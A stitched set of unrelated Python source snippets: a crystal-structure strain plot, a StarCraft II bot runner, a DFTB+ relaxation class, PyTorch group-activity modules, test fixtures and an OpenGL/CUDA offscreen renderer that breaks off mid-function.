ax.scatter(etamirrormat[:,0],etamirrormat[:,1],color=redundantcolorscore,edgecolors='gray',s=50,alpha=0.5)
ax.scatter(etarotmat[:,0],etarotmat[:,1],color=redundantcolorscore,edgecolors='gray',s=50,alpha=0.5)
#plot original data
ax.scatter(eta2,eta3,s=50,edgecolors='k',color=colorscore)
ax.set_aspect('equal')
ax.set_xlim([-0.3,0.3])
ax.set_ylim([-0.3,0.3])
ax.set_xlabel(r"$\mathrm{e_2}$")
ax.set_ylabel(r"$\mathrm{e_3}$")
ax.set_title(r"\textbf{FCC strain relaxations}")
red_patch = mpatches.Patch(color='red', label=r'\textbf{FCC}')
green_patch = mpatches.Patch(color='green', label=r'\textbf{BCC}')
blue_patch = mpatches.Patch(color='blue', label=r'\textbf{HCP}')
ax.legend(handles=[red_patch,green_patch,blue_patch],prop={'size':12},loc="upper left")
plt.tight_layout()
plt.show()
#Save the configurations that are FCC
FCCindx=[(bestscore==0)]
FCCnames=names[FCCindx]
FCCfiltered=np.array(FCCscore[FCCindx],dtype="S25")
FCCdump=np.vstack((FCCnames,FCCfiltered)).T
np.savetxt("FCC_scores.txt",FCCdump,fmt="%s")
#Save the configurations that are BCC
BCCindx=[(bestscore==1)]
BCCnames=names[BCCindx]
BCCfiltered=np.array(BCCscore[BCCindx],dtype="S25")
BCCdump=np.vstack((BCCnames,BCCfiltered)).T
np.savetxt("BCC_scores.txt",BCCdump,fmt="%s")
#Save the configurations that are HCP
HCPindx=[(bestscore==2)]
HCPnames=names[HCPindx]
HCPfiltered=np.array(HCPscore[HCPindx],dtype="S25")
HCPdump=np.vstack((HCPnames,HCPfiltered)).T
np.savetxt("HCP_scores.txt",HCPdump,fmt="%s")
|
487168
|
from pathlib import Path
from sc2 import maps
from sc2.data import Race
from sc2.main import GameMatch, run_multiple_games
from sc2.player import BotProcess, Computer
def main():
run_multiple_games(
[
GameMatch(
maps.get("AcropolisLE"),
[
# Enable up to 2 of the 4 following bots to test this file
# Assuming you launch external_bot.py from the root directory of 'python-sc2'
BotProcess(
Path.cwd(),
["python", "examples/competitive/run.py"],
Race.Terran,
"CompetiveBot",
stdout="temp.txt",
),
# Bot(Race.Zerg, ZergRushBot()),
# Bot(Race.Zerg, ZergRushBot()),
Computer(Race.Zerg),
],
realtime=True,
),
]
)
if __name__ == "__main__":
main()
|
487184
|
import os
import time
import numpy as np
from pychemia import pcm_log
from pychemia.code import Relaxator
from pychemia.crystal import KPoints
from ..dftb import DFTBplus, read_detailed_out, read_dftb_stdout, read_geometry_gen
try:
from pychemia.symm import symmetrize
except ImportError:
def symmetrize(structure):
return structure
INITIAL_SCORE = -25
class Relaxation(Relaxator):
def __init__(self, structure, relaxator_params=None, workdir='.', kpoints=None, target_forces=1E-3, waiting=False,
kp_density=10000, forced=True):
self.workdir = workdir
self.initial_structure = structure
self.slater_path = None
self.symmetrize = False
self.forced = forced
if relaxator_params is None:
relaxator_params = {'slater_path': '.'}
self.set_params(relaxator_params)
if self.symmetrize:
self.initial_structure = symmetrize(structure)
self.structure = self.initial_structure.copy()
self.waiting = waiting
if kpoints is None:
self.kpoints = KPoints.optimized_grid(self.structure.lattice, kp_density=kp_density)
else:
self.kpoints = kpoints
Relaxator.__init__(self, target_forces)
def set_params(self, params):
assert (isinstance(params, dict))
if 'slater_path' not in params:
params['slater_path'] = '.'
if isinstance(params['slater_path'], str):
assert os.path.exists(params['slater_path'])
self.slater_path = [params['slater_path']]
else:
self.slater_path = params['slater_path']
try:
for x in self.slater_path:
assert os.path.exists(x)
except TypeError:
raise ValueError('Missing a valid slater_path or list of slater_paths')
if 'symmetrize' in params and params['symmetrize'] is True:
self.symmetrize = True
def run(self):
irun = 0
score = INITIAL_SCORE
dftb = DFTBplus(workdir=self.workdir)
dftb.initialize(structure=self.structure, kpoints=self.kpoints)
dftb.set_slater_koster(search_paths=self.slater_path)
dftb.basic_input()
dftb.driver['LatticeOpt'] = False
        # Decrease the target_forces to keep the final static calculation
        # from raising the forces too much after symmetrization
dftb.driver['MaxForceComponent'] = self.target_forces
dftb.driver['ConvergentForcesOnly'] = True
dftb.driver['MaxSteps'] = 100
dftb.hamiltonian['MaxSCCIterations'] = 20
dftb.set_inputs()
print('Launching DFTB+ with target force of %9.2E ' % dftb.driver['MaxForceComponent'])
dftb.run()
if self.waiting:
dftb.runner.wait()
while True:
if dftb.runner is not None and dftb.runner.poll() is not None:
pcm_log.info('Execution completed. Return code %d' % dftb.runner.returncode)
stdo = read_dftb_stdout(filename=self.workdir + os.sep + 'dftb_stdout.log')
good_forces, good_stress = self.relaxation_status()
if 'max_force' in stdo:
print('Converged: %s\t Max Force: %9.3e\t MaxForceComponent: %9.3e' % (stdo['ion_convergence'],
stdo['max_force'],
self.target_forces))
filename = dftb.workdir + os.sep + 'detailed.out'
if not os.path.exists(filename):
pcm_log.error('Could not find ' + filename)
break
if not good_forces and not good_stress:
# This happens when all the SCC are completed without convergence
dftb.driver['ConvergentForcesOnly'] = False
else:
dftb.driver['ConvergentForcesOnly'] = True
score = self.quality(score)
pcm_log.debug('Score : %d Good Forces: %s Good Stress: %s' % (score, good_forces, good_stress))
if score < 0:
if good_forces and good_stress:
pcm_log.debug('Convergence: Internals + Cell')
dftb.driver['MovedAtoms'] = '1:-1'
dftb.driver['LatticeOpt'] = True
elif not good_forces and good_stress:
pcm_log.debug('Convergence: Internals')
dftb.driver['LatticeOpt'] = False
dftb.driver['MovedAtoms'] = '1:-1'
elif good_forces and not good_stress:
pcm_log.debug('Convergence: Internals + Cell')
dftb.driver['LatticeOpt'] = True
dftb.driver['MovedAtoms'] = '1:-1'
dftb.structure = read_geometry_gen(dftb.workdir + os.sep + 'geo_end.gen')
                    # let's perturb the positions if the score has dropped to -10
if score == -10 and self.forced:
dftb.structure.positions += 0.2 * np.random.rand(dftb.structure.natom, 3) - 0.1
dftb.structure.positions2reduced()
dftb.structure.set_cell(1.1 * dftb.structure.cell)
if score == -1 and self.forced:
dftb.structure = dftb.structure.random_cell(dftb.structure.composition)
print('RANDOM STRUCTURE')
print(dftb.structure)
score = INITIAL_SCORE
dftb.structure.save_json(dftb.workdir + os.sep + 'structure_current.json')
if self.symmetrize:
dftb.structure = symmetrize(dftb.structure)
self.structure = dftb.structure
dftb.get_geometry()
dftb.roll_outputs(irun)
dftb.set_inputs()
irun += 1
print('Launching DFTB+ with target force of %9.2E ' % dftb.driver['MaxForceComponent'])
dftb.run()
if self.waiting:
dftb.runner.wait()
else:
pcm_log.debug('Final static calculation')
dftb.structure = self.get_final_geometry()
dftb.structure.save_json(dftb.workdir + os.sep + 'structure_final.json')
if self.symmetrize:
dftb.structure = symmetrize(dftb.structure)
self.structure = dftb.structure
dftb.get_geometry()
dftb.roll_outputs(irun)
dftb.options['CalculateForces'] = True
dftb.driver = {}
dftb.set_inputs()
print('Launching DFTB+ with static evaluation of forces ')
dftb.run()
if self.waiting:
dftb.runner.wait()
while dftb.runner.poll() is None:
dftb.run_status()
time.sleep(10)
print('Completed Static run')
forces, stress, total_energy = self.get_forces_stress_energy()
if stress is None or forces is None or total_energy is None:
pcm_log.debug('Null Forces, Stress or Energy, relaxing and exiting')
dftb.basic_input()
dftb.driver['LatticeOpt'] = False
                        # Decrease the target_forces to keep the final static calculation
                        # from raising the forces too much after symmetrization
dftb.driver['MaxForceComponent'] = 0.9 * self.target_forces
dftb.driver['ConvergentForcesOnly'] = False
dftb.driver['MaxSteps'] = 10
dftb.hamiltonian['MaxSCCIterations'] = 50
print(dftb.driver)
dftb.set_inputs()
dftb.run()
if self.waiting:
dftb.runner.wait()
while dftb.runner.poll() is None:
time.sleep(10)
print('FINAL:', read_detailed_out(filename=filename))
forces, stress, total_energy = self.get_forces_stress_energy()
if stress is None or forces is None or total_energy is None:
pcm_log.debug('Again Null Forces, Stress or Energy, Randomizing Structure')
dftb.structure = dftb.structure.random_cell(dftb.structure.composition)
print('RANDOM STRUCTURE')
print(dftb.structure)
score = INITIAL_SCORE
else:
break
else:
break
else:
pcm_log.debug('ID: %s' % os.path.basename(self.workdir))
filename = dftb.workdir + os.sep + 'dftb_stdout.log'
if os.path.exists(filename):
stdo = read_dftb_stdout(filename=filename)
print('Number of steps:', len(stdo['Geometry_Steps']))
if len(stdo['Geometry_Steps']) > 1:
line = 'Energy behavior: '
prev_energy = stdo['Geometry_Steps'][0]['Total Energy']['value']
line += ' %7.3f ' % prev_energy
for step in stdo['Geometry_Steps'][1:]:
new_energy = step['Total Energy']['value']
if prev_energy > new_energy:
line += '>'
else:
line += '<'
prev_energy = new_energy
finene = stdo['Geometry_Steps'][-1]['Total Energy']['value']
line += ' %7.3f' % finene
print(line)
time.sleep(10)
def quality(self, score):
good_forces, good_stress = self.relaxation_status()
if good_forces and good_stress:
print('Finished with forces and stress under target_forces')
score = 0
elif good_forces:
print('Finished with forces under target_forces (not stress)')
score = score
else:
# Increase the score on each iteration
score += 1
if self.structure.density < 0.1:
print('Very small density = Bad Structure')
score = -1
return score
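    # Score progression (summary of the logic above): a run starts at
    # INITIAL_SCORE (-25); quality() adds 1 whenever the forces are not yet
    # under the target, sets 0 once both forces and stress converge, and sets
    # -1 when the density falls below 0.1. In run(), a score of -10 perturbs
    # the positions and inflates the cell (only when forced), a score of -1
    # (again only when forced) replaces the structure with a random cell and
    # resets the score, and a score of 0 or above triggers the final static
    # calculation.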
def get_forces_stress_energy(self):
filename = self.workdir + os.sep + 'detailed.out'
if os.path.isfile(filename):
ret = read_detailed_out(filename=filename)
forces = ret['forces']
stress = ret['stress']
total_energy = ret['total_energy']
else:
forces = None
stress = None
total_energy = None
return forces, stress, total_energy
def get_final_geometry(self):
geometry = self.workdir + os.sep + 'geo_end.gen'
if os.path.isfile(geometry):
return read_geometry_gen(geometry)
else:
# For static calculations the 'geo_end.gen' is not generated
# returning the internal structure
return self.structure
|
487191
|
import json
import numpy as np
from . import c, utils
__DTYPE_CACHE = None
def get_occa_dtype(dtype):
global __DTYPE_CACHE
if not __DTYPE_CACHE:
__DTYPE_CACHE = get_dtype_cache()
# Make sure we have a numpy dtype
dtype = np.dtype(dtype)
occa_dtype = __DTYPE_CACHE.get(dtype)
if occa_dtype is None:
occa_dtype = c.dtype(json=dtype_to_json(dtype))
__DTYPE_CACHE[dtype] = occa_dtype
return occa_dtype
def dtype_to_json(dtype, **kwargs):
return json.dumps(dtype_to_obj(dtype), **kwargs)
def dtype_to_obj(dtype):
# dtype tuple (np.float32, (2,2))
if dtype.shape:
count = 1
for n in dtype.shape:
count *= n
[subdtype, *_] = dtype.subdtype
return [dtype_to_obj(subdtype), count]
# dtype(np.float32)
if not dtype.fields:
return utils.TYPES_TO_C_TYPES[dtype.type]
# dtype([...])
return [
[field, dtype_to_obj(field_dtype)]
for field, [field_dtype, *_] in dtype.fields.items()
]
def get_dtype_cache():
return {
np.dtype(np.bool_): c.dtype(builtin='bool'),
np.dtype(np.int8): c.dtype(builtin='int8'),
np.dtype(np.uint8): c.dtype(builtin='uint8'),
np.dtype(np.int16): c.dtype(builtin='int16'),
np.dtype(np.uint16): c.dtype(builtin='uint16'),
np.dtype(np.int32): c.dtype(builtin='int32'),
np.dtype(np.uint32): c.dtype(builtin='uint32'),
np.dtype(np.int64): c.dtype(builtin='int64'),
np.dtype(np.uint64): c.dtype(builtin='uint64'),
np.dtype(np.float32): c.dtype(builtin='float'),
np.dtype(np.float64): c.dtype(builtin='double'),
}
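# Illustrative sketch (field names are made up, and the exact scalar names
# depend on utils.TYPES_TO_C_TYPES): dtype_to_obj maps a structured dtype such
# as np.dtype([('id', np.int32), ('weights', np.float64, (3,))]) to nested
# [name, type] pairs along the lines of
# [['id', <c name for int32>], ['weights', [<c name for float64>, 3]]].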
|
487204
|
import torch.nn as nn
import torch
import torch.nn.functional as F
import numpy as np
import cv2
from utils import calc_pairwise_distance_3d
# from hrnet.init_hrnet import cls_hrnet_w32, pose_hrnet_w32
from config import Config
################# Bilinear Pooling Reasoning Module ###################
class STBilinearMessagingPassing(nn.Module):
def __init__(self, emb_fea_num, message_fea_num, T=3):
super(STBilinearMessagingPassing, self).__init__()
print('The emb_fea_num of Bilinear is ' + str(emb_fea_num))
print('The message_fea_num of Bilinear is ' + str(message_fea_num))
self.T = T
'''
self.U = nn.Linear(emb_fea_num, message_fea_num, bias=True)
self.V = nn.Linear(emb_fea_num, message_fea_num, bias=True)
self.w_a = nn.Parameter(torch.FloatTensor(1, message_fea_num), requires_grad=True)
'''
self.U = nn.Linear(emb_fea_num, emb_fea_num, bias=True)
self.V = nn.Linear(emb_fea_num, emb_fea_num, bias=True)
self.w_a = nn.Parameter(torch.FloatTensor(1, emb_fea_num), requires_grad=True)
# jianshu.com/p/d8b77cc02410
nn.init.kaiming_normal_(self.w_a)
self.W_e2 = nn.Linear(emb_fea_num, message_fea_num, bias=False)
self.W_e1 = nn.Linear(message_fea_num, emb_fea_num, bias=False)
self.layernorm = nn.LayerNorm(message_fea_num)
self.non_linear = nn.ReLU(inplace=True)
#nn.init.kaiming_normal_(self.W_e1.weight)
#nn.init.kaiming_normal_(self.W_e2.weight)
self.R_mat = None
def forward(self, feature, mask):
'''
:param feature: shape:[B*T, N, NFB]
:param mask: [B*T, N, N]
:return: [B*T, N, NFB]
'''
T = self.T
B = feature.shape[0]//T
#BT = feature.shape[0]
N = feature.shape[1]
feature = feature.reshape(B, T*N, -1)
# feature = feature.reshape(BT*N, -1)
feature_U = self.U(feature) # [B, T*N, NFM]
# feature_U = feature_U.reshape(BT, N, -1)
feature_V = self.V(feature) # [B, T*N, NFM]
# feature_V = feature_V.reshape(BT, N, -1)
feature_U = feature_U * self.w_a # [B, T*N, NFM]
UV = torch.matmul(feature_U, feature_V.transpose(1, 2)) # [B, T*N, T*N]
UV[mask] = -float('inf')
# print("UV shape:"+str(UV.shape))
matrix_e = F.softmax(UV, dim=2) # [B, T*N, T*N] softmax by row!!!!!
self.R_mat = matrix_e
feature_W_e2 = self.W_e2(feature)
feature_e = torch.matmul(matrix_e, feature_W_e2) # [B, T*N, NFM]
feature_e_nl = self.layernorm(feature_e) # [B, T*N, NFM]
feature_e_nl_nonl = self.non_linear(feature_e_nl) # [B, T*N, NFM]
feature_out = self.W_e1(feature_e_nl_nonl)
feature_out = feature_out.reshape(B*T, N, -1)
return feature_out
class multiheadSTBilinearMessagingPassing(nn.Module):
def __init__(self, emb_fea_num, message_fea_num, num_heads, T=3):
super(multiheadSTBilinearMessagingPassing, self).__init__()
self.bilinear_list = nn.ModuleList([STBilinearMessagingPassing(emb_fea_num, message_fea_num, T=T) for i in range(num_heads)])
self.num_heads = num_heads
self.vis_R_mat = torch.empty((0, 36, 36), dtype=torch.float32)
def forward(self, feature, mask, fusion_method, shortcut_connection = False):
if fusion_method == 'sum':
feature_out = self.bilinear_list[0](feature, mask)
#self.vis_R_mat = torch.cat((self.bilinear_list[0].R_mat.cpu(), self.vis_R_mat), dim = 0)
for i in range(self.num_heads - 1):
feature_out+=self.bilinear_list[i+1](feature, mask)
#self.vis_R_mat = torch.cat((self.bilinear_list[i+1].R_mat.cpu(), self.vis_R_mat),
# dim = 0)
elif fusion_method == 'cat':
feature_out = []
for i in range(self.num_heads):
feature_out.append(self.bilinear_list[i](feature, mask))
feature_out = torch.cat(feature_out, dim = 2)
#print(self.vis_R_mat.shape[0])
#if self.vis_R_mat.shape[0] == 20*3*8:
# save_R_mat = self.vis_R_mat.numpy().reshape(20*3*8, 36*36)
# np.savetxt('vis/R_mat/R_mat.txt', save_R_mat)
if fusion_method == 'sum':
if shortcut_connection == True:
return feature + feature_out
elif shortcut_connection == False:
return feature_out
elif fusion_method == 'cat':
return torch.cat((feature_out, feature), dim=2)
def generate_spatial_mask(boxes_positions, threshold, BT, N, OH):
"""
:param loc: B*T*N, 4 #Center point of every box
:param threshold: float, e.g. 0.3, 0.2
:return:
"""
boxes_positions_cl = boxes_positions.clone()
boxes_positions_cl[:, 0] = (boxes_positions_cl[:, 0] + boxes_positions_cl[:, 2]) / 2
boxes_positions_cl[:, 1] = (boxes_positions_cl[:, 1] + boxes_positions_cl[:, 3]) / 2
boxes_positions_cl = boxes_positions_cl[:, :2].reshape(BT, N, 2) # B*T, N, 2
boxes_distances = calc_pairwise_distance_3d(boxes_positions_cl, boxes_positions_cl) # B*T, N, N
position_mask = (boxes_distances > (threshold * OH))
return position_mask
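# Example with made-up numbers: for OH = 87 and threshold = 0.2, any pair of
# boxes whose centre points lie more than 0.2 * 87 = 17.4 apart (in the
# output-size coordinate frame) is marked True in position_mask, and message
# passing between them is suppressed wherever the mask is applied.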
################# Context Encoding Module ###################
################# Context Encoding Module ###################
################# Context Encoding Module ###################
class ContextEncodingTransformer(nn.Module):
def __init__(self, num_features_context, D, K, N, layer_id, num_heads_per_layer, context_dropout_ratio = 0.1):
super(ContextEncodingTransformer, self).__init__()
self.num_features_context = num_features_context
if layer_id == 1:
self.downsample1 = nn.Conv2d(D, num_features_context, kernel_size = 1, stride = 1)
self.downsample2 = nn.Conv2d(768, num_features_context, kernel_size = 1, stride=1)
'''nn.init.kaiming_normal_(self.downsample1.weight)
nn.init.kaiming_normal_(self.downsample2.weight)
self.downsample = nn.Conv2d(D, num_features_context, kernel_size=1, stride=1)'''
#nn.init.kaiming_normal_(self.downsample.weight)
self.emb_roi = nn.Linear(num_features_context * K * K, num_features_context, bias=True)
elif layer_id > 1:
self.downsample = nn.Conv2d(768, num_features_context, kernel_size=1, stride=1)
self.emb_roi = nn.Linear(num_features_context * num_heads_per_layer, num_features_context, bias=True)
nn.init.kaiming_normal_(self.downsample.weight)
self.N = N
self.K = K
self.dropout = nn.Dropout(context_dropout_ratio)
self.layernorm1 = nn.LayerNorm(num_features_context)
self.FFN = nn.Sequential(
nn.Linear(num_features_context,num_features_context, bias = True),
nn.ReLU(inplace = True),
nn.Dropout(context_dropout_ratio),
nn.Linear(num_features_context,num_features_context, bias = True)
)
self.layernorm2 = nn.LayerNorm(num_features_context)
def forward(self, roi_feature, image_feature, layer_id = -1):
"""
:param roi_feature: # B*T*N, D, K, K,
:param image_feature: # B*T, D, OH, OW
:return:
"""
NFC = self.num_features_context
BT, _,OH,OW = image_feature.shape
K = self.K #roi_feature.shape[3]
N = self.N #roi_feature.shape[0]//BT
assert N==12
assert layer_id>=1
if layer_id == 1:
roi_feature = self.downsample1(roi_feature)
image_feature = self.downsample2(image_feature)
roi_feature = roi_feature.reshape(-1, NFC*K*K)
emb_roi_feature = self.emb_roi(roi_feature) # B*T*N, D
elif layer_id > 1:
emb_roi_feature = self.emb_roi(roi_feature)
image_feature = self.downsample(image_feature)
emb_roi_feature = emb_roi_feature.reshape(BT, N, 1, 1, NFC) # B*T, N, 1, 1, D
image_feature = image_feature.reshape(BT, 1, NFC, OH, OW) # B*T, 1, D, OH, OW
image_feature = image_feature.transpose(2,3) # B*T, 1, OH, D, OW
a = torch.matmul(emb_roi_feature, image_feature) # B*T, N, OH, 1, OW
a = a.reshape(BT, N, -1) # B*T, N, OH*OW
A = F.softmax(a, dim=2) # B*T, N, OH*OW
image_feature = image_feature.transpose(3,4).reshape(BT, OH*OW, NFC)
context_encoding_roi = self.dropout(torch.matmul(A, image_feature).reshape(BT*N, NFC))
emb_roi_feature = emb_roi_feature.reshape(BT*N, NFC)
context_encoding_roi = self.layernorm1(context_encoding_roi + emb_roi_feature)
context_encoding_roi = context_encoding_roi + self.FFN(context_encoding_roi)
context_encoding_roi = self.layernorm2(context_encoding_roi)
return context_encoding_roi
class MultiHeadLayerContextEncoding(nn.Module):
def __init__(self, num_heads_per_layer, num_layers, num_features_context, D, K, N, context_dropout_ratio=0.1):
super(MultiHeadLayerContextEncoding, self).__init__()
self.CET = nn.ModuleList()
for i in range(num_layers):
for j in range(num_heads_per_layer):
self.CET.append(ContextEncodingTransformer(num_features_context, D, K, N, i+1, num_heads_per_layer, context_dropout_ratio))
self.num_layers = num_layers
self.num_heads_per_layer = num_heads_per_layer
def forward(self, roi_feature, image_feature):
"""
:param roi_feature: # B*T*N, D, K, K,
:param image_feature: # B*T, D, OH, OW
:return:
"""
for i in range(self.num_layers):
MHL_context_encoding_roi= []
for j in range(self.num_heads_per_layer):
MHL_context_encoding_roi.append(self.CET[i*self.num_heads_per_layer + j](roi_feature, image_feature, i+1))
roi_feature = torch.cat(MHL_context_encoding_roi, dim=1)
return roi_feature
class EmbfeatureContextEncodingTransformer(nn.Module):
def __init__(self, num_features_context, NFB, K, N, layer_id, num_heads_per_layer, context_dropout_ratio = 0.1):
super(EmbfeatureContextEncodingTransformer, self).__init__()
self.num_features_context = num_features_context
if layer_id == 1:
self.downsample2 = nn.Conv2d(512, num_features_context, kernel_size = 1, stride=1)
'''nn.init.kaiming_normal_(self.downsample1.weight)
nn.init.kaiming_normal_(self.downsample2.weight)
self.downsample = nn.Conv2d(D, num_features_context, kernel_size=1, stride=1)'''
self.emb_roi = nn.Linear(NFB, num_features_context, bias=True)
elif layer_id > 1:
self.downsample = nn.Conv2d(512, num_features_context, kernel_size=1, stride=1)
self.emb_roi = nn.Linear(num_features_context * num_heads_per_layer, num_features_context, bias=True)
nn.init.kaiming_normal_(self.downsample.weight)
self.N = N
self.K = K
self.dropout = nn.Dropout(context_dropout_ratio)
self.layernorm1 = nn.LayerNorm(num_features_context)
self.FFN = nn.Sequential(
nn.Linear(num_features_context,num_features_context, bias = True),
nn.ReLU(inplace = True),
nn.Dropout(context_dropout_ratio),
nn.Linear(num_features_context,num_features_context, bias = True)
)
self.layernorm2 = nn.LayerNorm(num_features_context)
self.att_map = None
def forward(self, roi_feature, image_feature, layer_id = -1):
"""
:param roi_feature: # B*T*N, NFB
:param image_feature: # B*T, D, OH, OW
:return:
"""
NFC = self.num_features_context
BT, _,OH,OW = image_feature.shape
K = self.K #roi_feature.shape[3]
N = self.N #roi_feature.shape[0]//BT
assert N==12
assert layer_id>=1
if layer_id == 1:
image_feature = self.downsample2(image_feature)
emb_roi_feature = self.emb_roi(roi_feature) # B*T*N, D
elif layer_id > 1:
emb_roi_feature = self.emb_roi(roi_feature)
image_feature = self.downsample(image_feature)
emb_roi_feature = emb_roi_feature.reshape(BT, N, 1, 1, NFC) # B*T, N, 1, 1, D
image_feature = image_feature.reshape(BT, 1, NFC, OH, OW) # B*T, 1, D, OH, OW
image_feature = image_feature.transpose(2,3) # B*T, 1, OH, D, OW
a = torch.matmul(emb_roi_feature, image_feature) # B*T, N, OH, 1, OW
a = a.reshape(BT, N, -1) # B*T, N, OH*OW
A = F.softmax(a, dim=2) # B*T, N, OH*OW
self.att_map = A
image_feature = image_feature.transpose(3,4).reshape(BT, OH*OW, NFC)
context_encoding_roi = self.dropout(torch.matmul(A, image_feature).reshape(BT*N, NFC))
emb_roi_feature = emb_roi_feature.reshape(BT*N, NFC)
context_encoding_roi = self.layernorm1(context_encoding_roi + emb_roi_feature)
context_encoding_roi = context_encoding_roi + self.FFN(context_encoding_roi)
context_encoding_roi = self.layernorm2(context_encoding_roi)
return context_encoding_roi
class MultiHeadLayerEmbfeatureContextEncoding(nn.Module):
def __init__(self, num_heads_per_layer, num_layers, num_features_context, NFB, K, N, context_dropout_ratio=0.1):
super(MultiHeadLayerEmbfeatureContextEncoding, self).__init__()
self.CET = nn.ModuleList()
for i in range(num_layers):
for j in range(num_heads_per_layer):
self.CET.append(EmbfeatureContextEncodingTransformer(num_features_context, NFB, K, N, i+1, num_heads_per_layer, context_dropout_ratio))
self.num_layers = num_layers
self.num_heads_per_layer = num_heads_per_layer
self.vis_att_map = torch.empty((0, 12, 43 * 78), dtype = torch.float32)
def forward(self, roi_feature, image_feature):
"""
:param roi_feature: # B*T*N, NFB,
:param image_feature: # B*T, D, OH, OW
:return:
"""
for i in range(self.num_layers):
MHL_context_encoding_roi= []
for j in range(self.num_heads_per_layer):
MHL_context_encoding_roi.append(self.CET[i*self.num_heads_per_layer + j](roi_feature, image_feature, i+1))
roi_feature = torch.cat(MHL_context_encoding_roi, dim=1)
return roi_feature
################# Pose Encoding Module ###################
################# Pose Encoding Module ###################
################# Pose Encoding Module ###################
img_name = ['1.jpg', '2.jpg', '3.jpg', '4.jpg', '5.jpg', '6.jpg',
'7.jpg', '8.jpg', '9.jpg', '10.jpg', '11.jpg', '12.jpg']
class Pose2d_Encoder(nn.Module):
def __init__(self, cfg, pose_net = 'pose_hrnet_w32'):
super(Pose2d_Encoder, self).__init__()
if pose_net == 'pose_hrnet_w32':
self.encoder = pose_hrnet_w32(pretrained=True)
self.cfg = cfg
def forward(self, image, boxes):
"""
:param image: # B*T, 3, H, W # after mean and std tranform
:param boxes: # B*T*N, 4 # w1, h1, w2, h2 #OH, OW
:return:
"""
BT = image.shape[0]
N = int(boxes.shape[0] / BT)
OH, OW = self.cfg.out_size
H, W = self.cfg.image_size
#assert N == 12
ori_boxes = boxes.clone()
ori_boxes = ori_boxes.cpu().numpy()
ori_boxes[:,0] = np.clip(ori_boxes[:,0] / float(OW) * float(W), 0, W)
ori_boxes[:,2] = np.clip(ori_boxes[:,2] / float(OW) * float(W), 0, W)
ori_boxes[:,1] = np.clip(ori_boxes[:,1] / float(OH) * float(H), 0, H)
ori_boxes[:,3] = np.clip(ori_boxes[:,3] / float(OH) * float(H), 0, H)
ori_boxes = ori_boxes.reshape(BT, N, 4) #BT, N, 4
roi_image = []
for i in range(BT):
for j in range(N):
ij_box = (int(ori_boxes[i][j][1]), int(ori_boxes[i][j][3]), int(ori_boxes[i][j][0]), int(ori_boxes[i][j][2]))
roi_image.append(image[i, :, ij_box[0]:ij_box[1], ij_box[2]:ij_box[3]])
roi_image[-1] = roi_image[-1].cpu().numpy()
roi_image[-1] = roi_image[-1].transpose(1,2,0) # 3,H,W ->H,W,3
roi_image[-1] = cv2.resize(roi_image[-1], (192, 256))
#cv2.imwrite(img_name[j], roi_image[-1]*255.)
roi_image[-1] = torch.Tensor(roi_image[-1].transpose(2,0,1)) # H,W,3 ->3,H,W
roi_image = torch.stack(roi_image, dim = 0) # B*T*N, 3, H, W
roi_image = roi_image.cuda()
#print(roi_image.shape) #torch.Size([72, 3, 256, 192])
roi_pose_feature = self.encoder(roi_image)
return roi_pose_feature
if __name__=='__main__':
'''test SpatialMessagePassing
s = SpatialMessagePassing(4, 4)
t = torch.rand(1,4,4)
mask = torch.ones((1,4,4))
print(s(t, mask))
print(t)'''
'''test Pose2d_Encoder
cfg = Config('volleyball')
p2d = Pose2d_Encoder(cfg)'''
'''test Context Encoding Transformer
cet = ContextEncodingTransformer(num_features_context=128,D=256, K=5, N=12, layer_id=1,
num_heads_per_layer=1, context_dropout_ratio = 0.1)
roi_feature = torch.rand(36,256,5,5)
image_feature = torch.rand(3, 256, 45, 80)
context_encoding_roi = cet(roi_feature, image_feature, 1)
print(context_encoding_roi.shape)'''
'''test multi-layer multi-head context encoding transformer'''
mlhcet = MultiHeadLayerContextEncoding(3, 1, num_features_context=128, D=256, K=5, N=12, context_dropout_ratio=0.1)
roi_feature = torch.rand(36, 256, 5, 5)
image_feature = torch.rand(3, 256, 45, 80)
context_encoding_roi = mlhcet(roi_feature, image_feature)
print(context_encoding_roi.shape)
'''test temporal message passing
tmp = multiheadTemporalMessage(128, 128, 3)
t1 = torch.rand(6,12,128)
mask = generate_temporal_mask(2, 12, 3)
print(mask.shape)
output = tmp(t1, mask, shortcut_connection=True)
print(output)
print(output.shape)'''
|
487205
|
import pytest
@pytest.fixture
def matched_set(testapp, lab, award):
item = {
'lab': lab['@id'],
'award': award['@id']
}
return item
@pytest.fixture
def base_matched_set(testapp, lab, award):
item = {
'award': award['uuid'],
'lab': lab['uuid']
}
return testapp.post_json('/matched_set', item, status=201).json['@graph'][0]
|
487211
|
import cocotb
@cocotb.test()
async def test(dut):
# Toggling an input should trigger the simulator to print a message
# similar to:
#
# b.vhdl:9:5:@0ms:(report note): :a(structural):b@b(structural):
#
dut.x.value = False
|
487246
|
from glumpy import app, gloo, gl
from contextlib import contextmanager
import numpy as np
try:
import pycuda.driver
from pycuda.gl import graphics_map_flags, BufferObject
_PYCUDA = True
except ImportError as err:
print('pycuda import error:', err)
_PYCUDA = False
import torch
class OffscreenRender:
def __init__(self, viewport_size, out_buffer_location='opengl', clear_color=None):
self._init_buffers(viewport_size, out_buffer_location)
self.clear_color = clear_color if clear_color is not None else (0., 0., 0., 1.)
def _init_buffers(self, viewport_size, out_buffer_location):
assert out_buffer_location in ['torch', 'opengl', 'numpy']
if out_buffer_location == 'torch':
assert _PYCUDA, 'pycuda is not available'
try:
                import pycuda.gl.autoinit  # this may fail in headless mode
            except Exception:
raise RuntimeError('PyCUDA init failed, cannot use torch buffer')
_ = torch.cuda.FloatTensor(1, 3, 512,512) # needs init here, otherwise does not work
color_np = np.zeros((viewport_size[1], viewport_size[0], 4), np.float32)
self.color_buf, self.color_buf_cuda = create_shared_texture(color_np)
self.out_buf = torch.zeros((viewport_size[1], viewport_size[0], 4), dtype=torch.float32).cuda()
elif out_buffer_location == 'opengl':
self.color_buf = np.zeros((viewport_size[1], viewport_size[0], 4), dtype=np.float32).view(gloo.TextureFloat2D)
self.out_buf = self.color_buf
elif out_buffer_location == 'numpy':
self.color_buf = np.zeros((viewport_size[1], viewport_size[0], 4), dtype=np.float32).view(gloo.TextureFloat2D)
self.out_buf = np.zeros((viewport_size[1], viewport_size[0], 3), dtype=np.float32)
self.viewport_size = viewport_size
self.out_buffer_location = out_buffer_location
self.depth_buf = gloo.DepthBuffer(viewport_size[0], viewport_size[1], gl.GL_DEPTH_COMPONENT32)
self.fbo = gloo.FrameBuffer(color=self.color_buf, depth=self.depth_buf)
def render(self, scene, cull_face=True):
self.fbo.activate()
gl.glEnable(gl.GL_PROGRAM_POINT_SIZE)
gl.glEnable(gl.GL_DEPTH_TEST)
